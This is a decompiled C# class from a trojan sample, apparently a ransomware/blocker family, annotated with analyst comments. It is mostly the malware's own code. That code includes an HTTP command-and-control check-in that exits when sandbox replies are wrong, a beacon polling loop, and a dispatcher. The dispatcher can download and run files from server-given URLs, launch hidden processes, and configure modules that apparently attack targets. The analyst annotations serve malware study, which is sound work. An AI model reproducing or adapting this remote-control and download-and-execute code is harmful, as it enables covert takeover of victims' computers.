// Decompiled with JetBrains decompiler
// Type: A.c9b81b1a3e4ee51d08f5de2448e459036
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;
using System.Threading;

namespace A
{
  // Analyst notes (static reading of the decompiled listing only).
  // This type is the network control loop of the sample named in the header: it performs a
  // blocking HTTP check-in, then polls the same URL on a timer and dispatches the reply as a
  // '*'-delimited command. Every string literal is fetched through an index-based decoder
  // (c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf), so parameter names,
  // command names, header values and paths are NOT visible in this file; anything said about
  // their content below is marked as an assumption.
  // All exceptions are swallowed by empty catch blocks, so failures leave no trace on the host.
  internal class c9b81b1a3e4ee51d08f5de2448e459036
  {
    // Last non-empty server reply that was dispatched; used to avoid re-running an unchanged command.
    private string c749d615fce46a65e549ecd0269efb309 = string.Empty;

    // Entry point: runs the check-in synchronously (it only returns once the server has
    // answered with the expected token), then starts the command-polling loop on a new thread.
    public void ccca4f7e07f327977d582f4cecb7af4cd()
    {
      this.c70c0917b5d671ac9ae9d4e7f861b66d0();
      new Thread(new ThreadStart(this.ca33aa6acdace65e5414a966dd1dc03ae)).Start();
    }

    // Check-in loop. Builds a request body from four decoded fragments interleaved with four
    // configuration fields (presumably "name=value" pairs describing the host/build; the
    // fragments are encoded, TODO confirm by decoding indices 1377/1402/1419/1436).
    private void c70c0917b5d671ac9ae9d4e7f861b66d0()
    {
      string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1377) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1402) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cdd86f79582ee69b3331f0a01a8458c64 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1419) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c08c5101a594b5e3a22d4e523b7baa2b1 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1436) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c8d4d9680af49d6d5dcc86b05695287f2;
      while (true)
      {
        try
        {
          string str = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
          if (str.Length > 0)
          {
            // The expected reply is the same configuration value that the request helper sends
            // as its User-Agent. Any other non-empty reply terminates the process, which
            // happens before the polling thread is started: an analysis environment that
            // answers with arbitrary content will therefore observe no further behaviour.
            if (str == c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b)
              break;
            Environment.Exit(-1);
          }
        }
        catch
        {
          // Network or parsing errors are ignored; the loop simply retries after the sleep.
        }
        // Thread.Sleep takes milliseconds, so the configured interval is expressed in minutes.
        Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
      }
    }

    // Command-polling loop (runs forever on its own thread). Sends one decoded fragment plus
    // the first configuration field also used in the check-in body (presumably an identifier
    // for this installation; TODO confirm) and acts on the reply.
    private void ca33aa6acdace65e5414a966dd1dc03ae()
    {
      string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1453) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f;
      while (true)
      {
        try
        {
          string ce500fea65ca5a93a477a5ab3b4c7f34d = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
          if (ce500fea65ca5a93a477a5ab3b4c7f34d.Length > 0)
          {
            // Only a reply that differs from the previously dispatched one is executed.
            if (ce500fea65ca5a93a477a5ab3b4c7f34d != this.c749d615fce46a65e549ecd0269efb309)
            {
              this.c92d05caa41a6d8d9718da94fb32596c8(ce500fea65ca5a93a477a5ab3b4c7f34d);
              this.c749d615fce46a65e549ecd0269efb309 = ce500fea65ca5a93a477a5ab3b4c7f34d;
            }
          }
          else
          {
            // An empty reply calls one parameterless method on each of the four module classes
            // that dispatcher cases 0-3 configure (presumably their stop routines; the classes
            // are not in this file) and clears the remembered command.
            try
            {
              c2b32128b27710d76674c1117f7f19ccf.c90f6d098ad5ce70814005fb0adf72870();
            }
            catch
            {
            }
            try
            {
              c986963ced362383f6d7b6341e31dcfe7.c451004db98e7b627d5ee87fe743cb383();
            }
            catch
            {
            }
            try
            {
              ca2a3d5a1b8d431c404c11a5f27d5064a.c4f970d2f71876e66d1daba6a51237e62();
            }
            catch
            {
            }
            try
            {
              cb7379333abfa1ab1cb35304f3a8573ec.cc3c1bbd84093cbd7bdc83bcc5fb3ac15();
            }
            catch
            {
            }
            this.c749d615fce46a65e549ecd0269efb309 = string.Empty;
          }
        }
        catch
        {
          // Also absorbs anything thrown by the dispatcher (for example an index error on a
          // reply with too few '*'-separated fields).
        }
        // Same minute-based interval as the check-in loop, giving a regular beacon period.
        Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
      }
    }

    // HTTP helper: sends the second argument as an ASCII request body to the URL in the first
    // argument and returns the trimmed response body (empty string when there is no response).
    // Content-Type and method are decoded strings (a request body is written, so the method is
    // presumably POST; TODO confirm index 1545). The User-Agent is a fixed configuration value,
    // so every request from this class carries the same header. The response and the
    // StreamReader are never closed or disposed.
    private string c372676659fe6f48f27b1ad11ccb40951(
      string cf7d7ab02f04f36e1e7781d49924e7769,
      string c2cbf7d2e1f35e8102d156c340d5f99cb)
    {
      // Suppresses the "Expect: 100-continue" header process-wide for subsequent requests.
      ServicePointManager.Expect100Continue = false;
      HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(cf7d7ab02f04f36e1e7781d49924e7769);
      httpWebRequest.ContentType = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1478);
      httpWebRequest.Method = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1545);
      httpWebRequest.UserAgent = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b;
      byte[] bytes = Encoding.ASCII.GetBytes(c2cbf7d2e1f35e8102d156c340d5f99cb);
      httpWebRequest.ContentLength = (long) bytes.Length;
      Stream requestStream = httpWebRequest.GetRequestStream();
      requestStream.Write(bytes, 0, bytes.Length);
      requestStream.Close();
      WebResponse response = httpWebRequest.GetResponse();
      return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim();
    }

    // Command dispatcher. The reply is split on '*'; field 0 selects one of eight commands via
    // a lazily built lookup table and the remaining fields are that command's arguments.
    // Arguments come straight from the server reply with no validation beyond numeric parsing.
    private void c92d05caa41a6d8d9718da94fb32596c8(string ce500fea65ca5a93a477a5ab3b4c7f34d)
    {
      string[] strArray = new string[0];
      try
      {
        strArray = ce500fea65ca5a93a477a5ab3b4c7f34d.Split('*');
      }
      catch
      {
      }
      string key;
      if ((key = strArray[0]) == null)
        return;
      // The block below is the compiler's expansion of a switch over a string: command names
      // (decoded, not visible here) are mapped to the integers 0-7.
      // NOTE(review): the generic arguments of Dictionary appear to have been lost when this
      // listing was extracted; keys are strings and the value feeds an int out-parameter.
      // ISSUE: reference to a compiler-generated field
      if (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc == null)
      {
        // ISSUE: reference to a compiler-generated field
        c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc = new Dictionary(8)
        {
          {
            c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1554),
            0
          },
          {
            c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1571),
            1
          },
          {
            c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1590),
            2
          },
          {
            c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1607),
            3
          },
          {
            c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1626),
            4
          },
          {
            c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1643),
            5
          },
          {
            c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1654),
            6
          },
          {
            c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1667),
            7
          }
        };
      }
      int num;
      // ISSUE: reference to a compiler-generated field
      // ISSUE: explicit non-virtual call
      if (!__nonvirtual (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc.TryGetValue(key, out num)))
        return;
      switch (num)
      {
        // Cases 0-3 each copy the reply fields into static fields of a separate module class
        // and then call a parameterless method on it. The field shapes (a string, a ushort and
        // several ints) are consistent with a target/port/count style configuration; the
        // modules themselves are not in this file, so their behaviour is unconfirmed here.
        case 0:
          try
          {
            c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
            c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
            c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
            c2b32128b27710d76674c1117f7f19ccf.c52cb3c9fa9ea96db544af1bec7b932c8 = Convert.ToInt32(strArray[4]);
            c2b32128b27710d76674c1117f7f19ccf.c68372a86611194582de7bf4f45c72f47();
            break;
          }
          catch
          {
            break;
          }
        case 1:
          try
          {
            c986963ced362383f6d7b6341e31dcfe7.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
            c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[2]);
            c986963ced362383f6d7b6341e31dcfe7.cef8e53905308fbf449ffc06b3aecf429();
            break;
          }
          catch
          {
            break;
          }
        case 2:
          try
          {
            ca2a3d5a1b8d431c404c11a5f27d5064a.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
            ca2a3d5a1b8d431c404c11a5f27d5064a.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
            ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
            ca2a3d5a1b8d431c404c11a5f27d5064a.ce1f122b7ea8865781912d724c92b0e28 = Convert.ToInt32(strArray[4]);
            ca2a3d5a1b8d431c404c11a5f27d5064a.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
            ca2a3d5a1b8d431c404c11a5f27d5064a.c1e47aee5510fe6af6ef6c306b4a8c34a();
            break;
          }
          catch
          {
            break;
          }
        case 3:
          try
          {
            cb7379333abfa1ab1cb35304f3a8573ec.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
            cb7379333abfa1ab1cb35304f3a8573ec.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
            cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
            cb7379333abfa1ab1cb35304f3a8573ec.cf0383b25e10d922cf775f947a9893ddb = Convert.ToInt32(strArray[4]);
            cb7379333abfa1ab1cb35304f3a8573ec.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
            cb7379333abfa1ab1cb35304f3a8573ec.cd351d92ca1a938962136bd5808af7e90();
            break;
          }
          catch
          {
            break;
          }
        // Case 4: download-and-run. Field 1 is fetched with WebClient.DownloadFile into a path
        // built from an environment variable (decoded name), a decoded separator and a file
        // name produced by a helper given a random integer from 5 to 11 (presumably the name
        // length) plus a decoded suffix; the saved file is then started as a process.
        // Host-side artefact: a freshly written file under that directory that is executed
        // immediately by the same process.
        case 4:
          try
          {
            string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
            new WebClient().DownloadFile(Convert.ToString(strArray[1]), Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
            new Process()
            {
              StartInfo = {
                FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str)
              }
            }.Start();
            break;
          }
          catch
          {
            break;
          }
        // Case 5: starts field 1 as a process with a hidden window. The value is passed to
        // ProcessStartInfo unchanged, so whatever the server names is what gets launched.
        case 5:
          try
          {
            Process process = new Process()
            {
              StartInfo = new ProcessStartInfo(Convert.ToString(strArray[1]))
            };
            process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process.Start();
            break;
          }
          catch
          {
            break;
          }
        // Case 6: passes field 1 to a helper defined elsewhere (purpose not visible here).
        // Unlike cases 0-5 there is no local try/catch; errors propagate to the polling loop.
        case 6:
          c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.c32ad199a1a1b21b2f3794ba8b7927c6b(Convert.ToString(strArray[1]));
          break;
        // Case 7: host-targeted action. The parameterless helper (defined elsewhere) runs only
        // when field 1 equals this machine's name or, upper-cased, equals a decoded constant
        // (presumably a wildcard meaning "every host"; TODO confirm index 1698).
        case 7:
          if (!(strArray[1] == Environment.MachineName) && !(strArray[1].ToUpper() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1698)))
            break;
          c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.ceaf8f38b42d6fe6312cc350ddb4ba0d6();
          break;
      }
    }
  }
}